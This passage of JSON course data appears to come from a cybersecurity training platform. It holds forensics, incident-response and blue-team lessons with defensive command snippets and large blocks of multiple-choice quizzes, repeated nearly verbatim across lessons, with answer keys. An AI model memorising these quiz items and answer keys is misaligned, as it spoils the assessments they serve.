licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-anti-forensics","cat":"Forensics & IR","title":"Anti-Forensics Detection","diff":4,"xp":300,"intro":"Detect attacker concealment techniques.","sections":[{"type":"text","content":"Timestomping, log clearing, fileless malware detection."},{"type":"code","lang":"bash","content":"# Timestomping: $SI vs $FN timestamp mismatch\nMFTECmd.exe -f $MFT --csv output\n# Log clearing: Event ID 1102\nGet-WinEvent -FilterHashtable @{LogName='Security';ID=1102}"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Timestomping modifies...","opts":["$FILE_NAME","$STANDARD_INFORMATION timestamps","Both","Neither"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-ransomware","cat":"Forensics & IR","title":"Ransomware IR Playbook","diff":2,"xp":200,"intro":"Respond to active ransomware.","sections":[{"type":"text","content":"Disconnect (don't power off), identify strain, check backups, check for decryptors."},{"type":"code","lang":"bash","content":"# 1. DISCONNECT from network (pull cable)\n# 2. DON'T power off (preserve RAM)\n# 3. ID the strain: id-ransomware.malwarehunterteam.com\n# 4. Check: nomoreransom.org\n# 5. Memory dump: winpmem memory.raw"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"First ransomware action?","opts":["Pay ransom","Disconnect from network (don't power off)","Reinstall OS","Call police"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"fo-malware-re","cat":"Forensics & IR","title":"Malware Reverse Engineering","diff":5,"xp":300,"intro":"Disassemble malware to understand behavior and extract IOCs.","sections":[{"type":"text","content":"Ghidra for static, x64dbg for dynamic, sandbox for behavior."},{"type":"code","lang":"bash","content":"strings -a malware.exe | grep -iE 'http|cmd|password'\n# Ghidra: analyze imports, find crypto, trace entry\n# x64dbg: bp CreateFileA, bp InternetConnectA"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"CreateRemoteThread suggests...","opts":["File encryption","Process injection","Network scanning","Registry access"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"df-firewall","cat":"Defense & Blue Team","title":"Firewall Rule Writing","diff":1,"xp":75,"intro":"Default deny, explicit allow.","sections":[{"type":"text","content":"Start with DROP all, add specific ACCEPT rules."},{"type":"code","lang":"bash","content":"iptables -P INPUT DROP\niptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT\niptables -A INPUT -p tcp --dport 22 -s 10.0.0.0/24 -j ACCEPT"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Default deny means...","opts":["Allow everything","Block everything not explicitly allowed","Log everything","Encrypt everything"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-patch","cat":"Defense & Blue Team","title":"Patch Management","diff":1,"xp":75,"intro":"Unpatched systems are #1 attack vector.","sections":[{"type":"text","content":"Inventory, subscribe to advisories, test, deploy, verify."},{"type":"code","lang":"bash","content":"apt install unattended-upgrades\ndpkg-reconfigure unattended-upgrades"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Unpatched vulns are...","opts":["Rare","The #1 attack vector","Windows only","Self-fixing"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-email-sec","cat":"Defense & Blue Team","title":"Email Security (SPF/DKIM/DMARC)","diff":1,"xp":100,"intro":"Prevent email spoofing.","sections":[{"type":"text","content":"SPF: who can send. DKIM: signature. DMARC: policy for failures."},{"type":"code","lang":"bash","content":"dig txt target.com | grep spf\ndig txt _dmarc.target.com"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"DMARC p=reject means...","opts":["Accept all","Reject emails failing SPF/DKIM","Log only","Encrypt"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-net-monitor","cat":"Defense & Blue Team","title":"Network Monitoring","diff":1,"xp":100,"intro":"See everything to detect anomalies.","sections":[{"type":"text","content":"NetFlow, PCAP, DNS logs, proxy logs, IDS alerts."},{"type":"code","lang":"bash","content":"zeek -i eth0\n# Outputs: conn.log dns.log http.log ssl.log"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Zeek provides...","opts":["Firewall rules","Detailed network protocol logs","Antivirus","Encryption"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"df-vuln-mgmt","cat":"Defense & Blue Team","title":"Vulnerability Management","diff":2,"xp":150,"intro":"Scan, prioritize, remediate, verify.","sections":[{"type":"text","content":"Risk-based: CVSS + asset criticality + exploitability."},{"type":"code","lang":"bash","content":"# Prioritize:\n# Critical + internet-facing + exploit = FIX NOW\n# Medium + internal + no exploit = schedule"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Risk-based prioritization considers...","opts":["CVSS only","CVSS + asset criticality + exploit availability","Asset value only","Age only"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important 